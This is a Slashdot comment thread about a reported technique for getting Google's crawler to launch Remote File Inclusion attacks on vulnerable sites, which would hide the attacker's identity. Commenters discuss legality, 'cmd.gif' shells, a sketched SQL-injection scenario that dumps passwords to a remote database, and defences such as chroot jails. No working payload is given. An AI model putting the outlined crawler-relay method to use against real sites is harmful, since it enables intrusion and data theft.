Anonymizing RFI Attacks Through Google 66
netbuzz writes "Noam Rathaus on his SecuriTeam blog describes a technique by which 'Google can be utilized to hack into websites — actively exploiting them (not information gathering by the use of "Google hacking," although that is how most of the sites vulnerable to RFI attacks are found).' He cites examples in the wild and even mentions that the technique could be used as a 'covert' communications channel."
but is it a crime... (Score:5, Interesting)
If I happen to create a utility capable of cracking a site but then store it for research, never distribute and never actively use then I've not committed a crime. If I distribute it to other researchers in good faith then I'm covered - at present its only the person who actively uses it that is guilty of a crime.
However, in this scenario (even if I could be traced) its arguable that *I* never attacked a site, all I did was to place a tool that could be used in that way in a public location. I'm not sure that would completely stand up given the recent ammendment to the UKs computer misuse act (i.e. reasonable belief that the tool would not be used in that fashion), but still...
As always it comes down to people...
PS:
Aas an aside I am currently running a survey for my MSc dissertation on IT admin access to confidential information. If you'd like to help out (and would like a shot at winning a £25 or $40 amazon voucher) then please take a look at:
https://msc-survery.priogenus.com/amazon.php [priogenus.com]
Re: (Score:2, Interesting)
Re: (Score:2, Interesting)
Re: (Score:1)
Re: (Score:1)
But I'm still not sure I agree, it might be equivalent to choosing to store your own rat poison in your own teapot in a flat that you didnt lock.... I'm certainly not saying its morally ok, but its probably closer to reckless endangerment than anything else.
Re: (Score:2, Funny)
Are you new to slashdot? The proper way to phrase this....ummmm...phrase is as follows:
My father's a vicar you insensitive clod!
Re: (Score:2)
Re: (Score:3, Insightful)
I'll preface this by saying IANAL...
Prove? No. Provide circumstancial evidence? Yup.
As the grandparent stated, the real judgment behind this crime is one of intent. The nature of these links is so specific, targeted and intentional, that even if one didn't get accused of willful attacking, he'd be guilty of negligence.
Maybe it doesn't seem as clear-cut because we're "j
Re: (Score:2)
However, in this scenario (even if I could be traced) its arguable that *I* never attacked a site, all I did was to place a tool that could be used in that way in a public location.
IANAL, but it seems to me that there is a long history of "public nuisance" and "reckless endangerment" in common law [wikipedia.org] that could be applied here (at least in countries like the UK and the USA whose legal systems are grounded on common law).
At present, if you created such a link and I discovered your link was accessable from
Anonymous? (Score:4, Informative)
Surely the "http://URI-with-malicious-code.php" section will still create logs on the victim server pointing to the source of the malicious code (but perhaps not who triggered it).
Re:Anonymous? (Score:4, Informative)
At least that's what I usually see every time I check the logs of a website I'm going to shut down for allowing foreign includes (to be run).
Re: (Score:2)
This seems like something clever and pointless just for the sake of it.
Re: (Score:1)
http://www.google.com/search?q=linkto%3Aslashdot.
Re: (Score:1)
http://www.google.com/search?as_lq=slashdot.org&b
Re: (Score:2)
Nope, googlebot doesn't fill in the referer :-(
However, it's not anonymous either. You can bet that if the victim server's admin understands how this was done, he will have no problem getting the relevant data from google's log, and there goes your little scheme!
So, this trick should never be used "on its own". It's still useful however, and here's how:
Don't pu
change behaviour for bots (Score:4, Informative)
Here [robotstxt.org] you have a db of web robots.
Re: (Score:1, Interesting)
Re: (Score:1)
Excluding google usually causes more issues (especially when management chirp up and say why aren't we being indexed).
This is a problem between google and the destination site.
Google are the ones here that are not verifying the URLs and attempting to use bad links.
The destination site should be using the best web server they can which is known to handle these kind of problems properly.
The web is broken in so many ways, google should have a good idea which are well
Re: (Score:2)
Googlebot presumes all provided links are good until it touches each one and sees the response header. If a 200 or 302 comes back, obviously it's a valid URL handled by the server. Whether the target of that URL is malicious or not is not really for Google to determine; all they do is crawl linked and submitted sites via an automated process. The responsibility is shared between Microsoft and the server admin to ensure
In reality... (Score:2, Insightful)
Reminds me of this post (Score:2)
Glasshouses... (Score:3, Informative)
RFI (Score:2)
Could someone define the RFI acronym? Neither the summary, article or google can explain it clearly.
Re: (Score:2, Informative)
Remote File Inclusion (Score:5, Informative)
Remote File Inclusion. It's a pretty poor term for this type of attack, because it's not the act of inclusion that causes the problem, it's the act of requesting the file in the first place.
Re: (Score:2)
Here's [uni-stuttgart.de] an example of an RFI attack designed to exploit a bit of sloppy coding in PHP Nuke.
Re: (Score:1)
Re: (Score:1)
Re: (Score:1)
Re: (Score:2)
It's a pretty good acronym if you actually are discussing including files. However, this attack is like me linking to http://site.com/database.php?hack-in-querystring [site.com] which has nothing to do with including remote files. Both bots and humans could follow that link and "attack" the site.
Re: (Score:1)
(nothing wrong with narrow subcultures, btw. nerds of any flavor are okay most times)
How not Who (Score:5, Informative)
Re: (Score:2, Interesting)
RFI? How about defining this? (Score:5, Informative)
Radio Frequency Interference? Request for Information? Radio France Internationale? Rodent Fangs Implementation? WHAT?
How about explaining what such an ambigious acronym actually means initially. As neither TFA nor the summary seems to have done so, I therefore will have do it here, just to make heads and tails of the rest of the discussion and perhaps illuminate someone else. Hit Google, slog through a pile of links indicating one of the above, or some company whose name includes the three letters. There are many of these. On Page 3 I found the Wikipedia page for this TLA, on which there is a dead link to what this must be: Remote File Inclusion.
How about that.
I was wondering if it was just me, that I had been off-line for too long (like 2 days) and missed out on the latest and greatest buzzword, again?
Re: (Score:1)
Re: (Score:2, Funny)
Re: (Score:2)
Re:RFI? How about defining this? (Score:4, Informative)
The description of the mechanism doesn't really makes sense. If you can exploit a victim site by feeding it an evil URL in a form parameter, why use Google at all? You've lost anonymity by including the URL.
Looking at the described effects, it sounds like what they do is feed google some malicious code wrapped up in something that looks like a URL on the victim site. Then Google spiders the URL, placing malicious content in the form parameters.
So, suppose you have a malicious SQL injection attack that causes your database dump the password table to a remote database. The trick is that you get Google to launch the attack for you. You have the malicious code obfuscate the destination, and it isn't clear skullduggery is going on by casual inspection of the logs. It won't show up in the database logs either because its not a transaction.
Re: (Score:1)
The interesting part was that the goal of the "attacker" was not to run an exploit against our machines but to attempt to inject a link into the page that
Simple solution (Score:5, Interesting)
Seriously, I hate to read article like this one. They don't offer any solution.....this kind of attacks are not new at all, you can find tons of such attacks from access.log file/p> tail -f /var/log/httpd/access.log
First get rid of fat apache and use like small and secure lighttpd if you are running a *small personal* web site. Second put lighttpd / Apache in chrooted jail and no one can install *php/perl* shell. I have documented the procedure for putting lighttpd in jail:
http://www.cyberciti.biz/tips/howto-setup-lighttpBoth yahoo and google runs entire webserver in chrooted jail. Other choice is use OpenBSD which runs Apache in chrooted jail out of box.
Re: (Score:2)
Yes, you are correct that such a setup will save you from certain attacks, however this isn't an alternative for proper, secure coding. Besides, anyone still using system() via a webserver (be it Apache or LightTPD) should be shot, regardless.
Re: (Score:2)
How so? You'll also need to install the PHP libs and old Mambo package inside the jail and run as non-root. Are you saying that PHP+Mambo can break outside a chrooted jail in OpenBSD? Worst case, they hack the jail but your base system hasn't been compromised.
don't need google (Score:1)
Re: (Score:2)
Anyway you can turn on the preview feature for tinyurl - so it displays the url first without taking you straight to it. I recommend that.
But the other url shortening services may not have such a feature.
Anyway, if you do the attack mentioned in the article it might be a good idea to use tinyurl or other similar sites, so that it is google and friends that expand the resulting url, so it is harder for the victim to figure out who hosted the original shortened url - since they on
In Soviet Russia - with a twist (Score:1)
I c-can't do it. *sob*. This is too easy. It's like taking candy from a baby. I'm sorry.
[walks away]
Against the System: Rise of the Robots (Score:1)
Prior art (Score:2)
It's not "HACKING WITH GOOGLE" it's using google (Score:1)
In the particular example it's searching in the code where's cmd.gif to use it to enable malicious via remote site.
It's not like using google to hack a specific site but just those who are vulnerable site (it's like searching for which site has phpbb2.6 and to use known exploits to "hack it" [with sql injuction or something).
This discovery is for script kiddies, not for real hackers who wants to hack a specif
no - doesn't require searching. (Score:1)
The article suggests searching cmd.gif to demonstrate that that method is being used, and indeed some of the results show that google's index carries urls containing attacks.
To inject those urls into google's index the attacker doesn't even need to run a search or even contact google a single time - he puts the attack (mentioning the specific host the attacker wants to attack) on some webpage and then waits for google
Covert communications channel? (Score:2)
I studied this 3 years ago (Score:2)
In Other News (Score:2)
Remember, you heard it here first!